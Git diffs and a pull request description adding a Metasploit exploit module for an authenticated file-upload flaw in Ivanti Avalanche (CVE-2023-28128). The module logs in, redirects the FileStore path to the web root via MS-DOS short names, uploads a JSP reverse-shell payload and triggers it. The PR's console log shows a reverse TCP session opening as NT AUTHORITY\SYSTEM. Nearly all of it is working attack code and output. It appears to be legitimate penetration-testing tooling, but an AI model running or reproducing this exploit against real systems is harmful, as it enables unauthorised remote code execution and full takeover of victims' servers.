-    boundary = "#{'-' * 6}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(15)}"
-    post_data = "#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"
-    post_data << "upload-form\r\n"
-    post_data << ''
-
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
-      'method' => 'POST',
-      'keep_cookies' => true
-    )
+    require 'pry'
+    binding.pry
   end
 
   def reset_filestore_dir; end

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -330,7 +330,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_file_for_cleanup("webapps/#{payload_name}")
     send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')),
+      'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')), # bypasses the app's filter, but is still resolved by java faces servlet
       'method' => 'GET',
       'keep_cookies' => true
     )

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -29,20 +29,21 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],
           ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],
+          ['URL', 'https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128'],
           ['CVE', '2023-28128']
         ],
         'Platform' => ['win', 'java'],
         'Privileged' => true,
         'Arch' => ARCH_JAVA,
         'Targets' => [
-          [ 'Automatic Target', {}]
+          [ 'Automatic Target', { 'DefaultOptions' => { 'Payload' => 'java/jsp_shell_reverse_tcp' } }]
         ],
         'DisclosureDate' => '2023-04-24',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
-          'SideEffects' => [ IOC_IN_LOGS ]
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
         }
       )
     )
@@ -65,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Failed to receive a response from the application') unless res
 
-    unless res.body.include?('Avalanche')
+    unless res.body.include?('Avalanche - User Login')
       return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')
     end
 
@@ -95,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true
     )
 
-    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Login')
+    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Avalanche - User Login')
 
     html = res.get_html_document
     view_state = get_view_state(html)
@@ -167,7 +168,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
-    new_config_path
   end
 
   def get_directory_val(res, dir_name)
@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def upload_payload(_config_path)
+  def upload_payload
     payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"
     # need to 'select' webapps/AvalancheWeb to upload a file
     res = send_request_cgi(
@@ -288,7 +288,8 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_name
   end
 
-  def reset_filestore_dir
+  def cleanup
+    restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'
     print_status('Attempting to restore config path')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
@@ -297,14 +298,14 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res
-      fail_with(Failure::UnexpectedReply, 'Could not access FileStore config. Please manually restore FileStore config path')
+      fail_with(Failure::UnexpectedReply, "Could not access FileStore config. #{restore_msg}")
     end
 
     html = res.get_html_document
     view_state = get_view_state(html)
-    fail_with(Failure::UnexpectedReply, 'Failed to get view state. Please manually restore FileStore config path') unless view_state
+    fail_with(Failure::UnexpectedReply, "Failed to get view state. #{restore_msg}") unless view_state
 
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
       'method' => 'POST',
       'keep_cookies' => true,
@@ -317,8 +318,15 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
     unless res&.body&.include?(@original_config_path)
-      print_warning('Failed to restore the FileStore config path to its original path. Please manually restore it.')
+      print_warning("Failed to restore the FileStore config path to its original path. #{restore_msg}")
+      return
     end
 
     print_good('Successfully restored the FileStore config path')
@@ -326,8 +334,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     authenticate
-    config_path = configure_filestore
-    payload_name = upload_payload(config_path)
+    configure_filestore
+    payload_name = upload_payload
 
     register_file_for_cleanup("webapps/#{payload_name}")
     send_request_cgi(
@@ -335,7 +343,5 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'keep_cookies' => true
     )
-  ensure
-    reset_filestore_dir
   end
 end

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -59,6 +59,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # Cleanup should not be needed after doing just a check.
+    @cleanup_needed = false
+
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'login.jsf'),
       'method' => 'GET'
@@ -80,9 +83,15 @@ class MetasploitModule < Msf::Exploit::Remote
     version = version[1]
     vprint_status("Version of Ivanti Avalanche appears to be v#{version}")
     ver_no = Rex::Version.new(version)
-    return CheckCode::Appears if ver_no < Rex::Version.new('6.4.0.186')
+    patched_version = Rex::Version.new('6.4.0.186')
 
-    CheckCode::Detected
+    if ver_no >= patched_version
+      CheckCode::Safe('Target has been patched!')
+    elsif ver_no < patched_version
+      CheckCode::Appears('Target appears to be running an unpatched version of Ivanti Avalanche!')
+    else
+      CheckCode::Unknown("This should never be hit! Some error occurred when grabbing the target version: #{ver_no}")
+    end
   end
 
   def authenticate
@@ -100,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html = res.get_html_document
     view_state = get_view_state(html)
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after browsing to the login page.') unless view_state
 
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'login.jsf'),
@@ -117,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    unless res&.code == 302 && res&.headers&.[]('Location')&.include?('inventory.jsf')
+    unless res&.code == 302 && res&.headers&.dig('Location')&.include?('inventory.jsf')
       fail_with(Failure::UnexpectedReply, 'Login failed')
     end
   end
@@ -149,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # determine drive letter
     drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)
-    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.> 1
+    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.>= 3
     drive_letter = drive_letter[1]
 
     new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"
@@ -175,10 +184,10 @@ class MetasploitModule < Msf::Exploit::Remote
     results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
     fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
 
-    expand_dir = results.find { |result| result.at('td').text.strip == dir_name }
+    expand_dir = results.find { |result| result.at('td')&.text&.strip == dir_name }
     fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir
     data_rk = expand_dir.at('@data-rk')&.value
-    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
+    fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk
 
     data_rk
   end
@@ -199,6 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def select_folder(data_rk, view_state)
+    @cleanup_needed = true
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
       'method' => 'POST',
@@ -229,18 +239,18 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
     web_data_rk = get_directory_val(res, 'webapps')
     view_state = get_view_state(res.get_html_document)
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state
 
     res = expand_folder(web_data_rk, view_state)
     fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res
     avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')
     view_state = get_view_state(res.get_html_document)
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after getting the directory value for AvalancheWeb') unless view_state
     res = select_folder(avalanche_data_rk, view_state)
     fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res
 
     view_state = get_view_state(res.get_html_document)
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after selecting the AvalancheWeb folder') unless view_state
 
     boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"
 
@@ -289,6 +299,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cleanup
+    if @cleanup_needed == false
+      return
+    end
+
     restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'
     print_status('Attempting to restore config path')
     res = send_request_cgi(
@@ -298,12 +312,16 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res
-      fail_with(Failure::UnexpectedReply, "Could not access FileStore config. #{restore_msg}")
+      print_error("Could not access FileStore config. #{restore_msg}")
+      return
     end
 
     html = res.get_html_document
     view_state = get_view_state(html)
-    fail_with(Failure::UnexpectedReply, "Failed to get view state. #{restore_msg}") unless view_state
+    unless view_state
+      print_error("Failed to get view state. #{restore_msg}")
+      return
+    end
 
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
@@ -333,6 +351,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    # Starting off we shouldn't need cleanup, however if we get to the point were we start
+    # to change config settings then we will need to clean that up.
+    @cleanup_needed = false
+
     authenticate
     configure_filestore
     payload_name = upload_payload

--- a/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
+++ b/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb
@@ -1,0 +1,199 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Piotr Bazydlo', # @chudypb - Vulnerability Discovery
+          'Shelby Pace' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],
+          [ 'CVE', '2023-28128']
+        ],
+        'Platform' => ['win'],
+        'Privileged' => false,
+        'Arch' => ARCH_JAVA,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2022-07-07',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('USERNAME', [ true, 'User name to log in with', 'amcadmin' ]),
+        OptString.new('PASSWORD', [ true, 'Password to log in with', 'admin' ]),
+        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/AvalancheWeb' ])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
+      'method' => 'GET'
+    )
+
+    return CheckCode::Unknown('Failed to receive a response from the application') unless res
+
+    unless res.body.include?('Avalanche') && res.body.include?('Login')
+      return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')
+    end
+
+    CheckCode::Safe
+  end
+
+  def authenticate
+    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?
+      fail_with(Failure::BadConfig, 'Please set the USERNAME and PASSWORD options')
+    end
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Login')
+
+    html = res.get_html_document
+    view_state = get_view_state(html)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state') unless view_state
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'login.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'loginForm' => 'loginForm',
+        'j_idt8' => '',
+        'loginField' => datastore['USERNAME'],
+        'passwordField' => datastore['PASSWORD'],
+        'TextCaptchaAnswer' => '',
+        'javax.faces.ViewState' => view_state,
+        'loginTableButton' => 'loginTableButton'
+      }
+    )
+
+    unless res&.code == 302 && res&.headers&.[]('Location')&.include?('inventory.jsf')
+      fail_with(Failure::UnexpectedReply, 'Login failed')
+    end
+  end
+
+  def get_view_state(html)
+    view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text
+
+    view_state
+  end
+
+  def configure_filestore
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.body.include?('FileStore')
+      fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')
+    end
+
+    html = res.get_html_document
+    view_state = get_view_state(html)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from FileStoreConfig page') unless view_state
+
+    @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text
+    fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path
+
+    # determine drive letter
+    drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)
+    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.> 1
+    drive_letter = drive_letter[1]
+
+    new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"
+    print_status("Changing FileStore config path to '#{new_config_path}'")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',
+        'formFileStoreConfig' => 'formFileStoreConfig',
+        'txtUncPath' => new_config_path,
+        'txtVelocityFolder' => '',
+        'javax.faces.ViewState' => view_state
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path') unless res&.body&.include?(new_config_path)
+    new_config_path
+  end
+
+  def upload_payload(_config_path)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.body&.include?('FileStore')
+    # need to 'select' webapps/AvalancheWeb to upload a file
+    html = res.get_html_document
+    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')
+    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results
+    web_app_dir = results.find { |res| res.at('td').text.strip == 'webapps' }
+    fail_with(Failure::UnexpectedReply, 'Failed to find the \'webapps\' directory to write to') unless web_app_dir
+    data_rk = web_app_dir.at('@data-rk')&.value
+    fail_with(Failure::UnexpectedReply, 'Failed to get value to expand \'webapps\' directory') unless data_rk
+    # require 'pry';binding.pry
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => {}
+    )
+
+    boundary = "#{'-' * 6}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(15)}"
+    post_data = "#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"
+    post_data << "upload-form\r\n"
+    post_data << ''
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),
+      'method' => 'POST',
+      'keep_cookies' => true
+    )
+  end
+
+  def reset_filestore_dir; end
+
+  def exploit
+    authenticate
+    config_path = configure_filestore
+    upload_payload(config_path)
+  end
+end


### PR DESCRIPTION
This adds an exploit module for an authenticated file upload vulnerability in versions below `v6.4.0.186` of Ivanti Avalanche.

Vulnerable versions of Ivanti Avalanche permit MS-DOS style short names in the configuration path for the Central FileStore. Because of this, an administrator can change the default path to the web root of the applications, upload a JSP file, and achieve RCE as `NT AUTHORITY\SYSTEM`.

## Verification

- [ ] Start `msfconsole`
- [ ] Do: `use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload`
- [ ] Do: `set USERNAME <uname>`
- [ ] Do: `set PASSWORD <pass>`
- [ ] Do: `set RHOST <ip>`
- [ ] Do: `run`
- [ ] You should get a shell as `NT AUTHORITY\SYSTEM`.

## Scenarios

```
msf6 > use exploit/windows/http/ivanti_avalanche_filestoreconfig_upload
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set rhost 192.168.140.150
rhost => 192.168.140.150
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > options

Module options (exploit/windows/http/ivanti_avalanche_filestoreconfig_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to log in with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.140.150  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                         /using-metasploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /AvalancheWeb    yes       The URI of the Example Application
   USERNAME   amcadmin         yes       User name to log in with
   VHOST                       no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.140.1    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/ivanti_avalanche_filestoreconfig_upload) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Original FileStore config path: 'C:\Program Files\Wavelink\Avalanche\EnterpriseServer\centralfilestore\files'
[*] Changing FileStore config path to 'C:\PROGRA~1\Wavelink\AVALAN~1\Web'
[+] Successfully uploaded 'LWRrxDXWxhbz.jsp'
[*] Attempting to restore config path
[!] Tried to delete webapps/LWRrxDXWxhbz.jsp, unknown result
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.150:50249) at 2023-05-08 14:27:58 -0500
[!] Failed to restore the FileStore config path to its original path. Please manually restore it.
[+] Successfully restored the FileStore config path


Shell Banner:
Microsoft Windows [Version 10.0.19041.630]
-----


C:\Program Files\Wavelink\Avalanche\Web>
C:\Program Files\Wavelink\Avalanche\Web>
C:\Program Files\Wavelink\Avalanche\Web>whoami
whoami
nt authority\system

C:\Program Files\Wavelink\Avalanche\Web>^C
Abort session 1? [y/N]  y

[*] 192.168.140.150 - Command shell session 1 closed.  Reason: User exit
```
